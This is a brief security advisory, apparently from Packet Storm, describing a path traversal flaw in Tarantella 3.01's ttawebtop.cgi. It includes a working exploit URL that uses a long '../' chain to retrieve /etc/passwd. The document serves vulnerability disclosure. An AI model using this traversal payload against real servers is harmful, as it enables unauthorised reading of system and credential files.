Tarantella 3.01 ttawebtop.cgi "show files" exploit. '..' and '/' are not filtered while processing user input, so it is possible to enter arbitrary values to retrieve files from remote sever, which should not be accessible normally. Exploit URL included.
9d5f4ace0d04cf6c840c506cafe1e2d3223f2c0444093380f59b04e3a168c8d5<html>
<body bgcolor="#000000" text="#CCCCCC">
<pre>
<b>Name</b> : tarantella 3.01 ttawebtop.cgi "show files" vulnerability
<b>Problem</b> : '..' and '/' are not filtered while processing
user input, so it is possible to enter arbitrary values
to retreive files from remote sever, which should not be
accessible normally.
<b>Exploit</b>:
http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=
../../../../../../../../../../../../../../../etc/passwd
<b>Author</b> : KF (dotslash@snosoft.com)
</pre>
</html>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed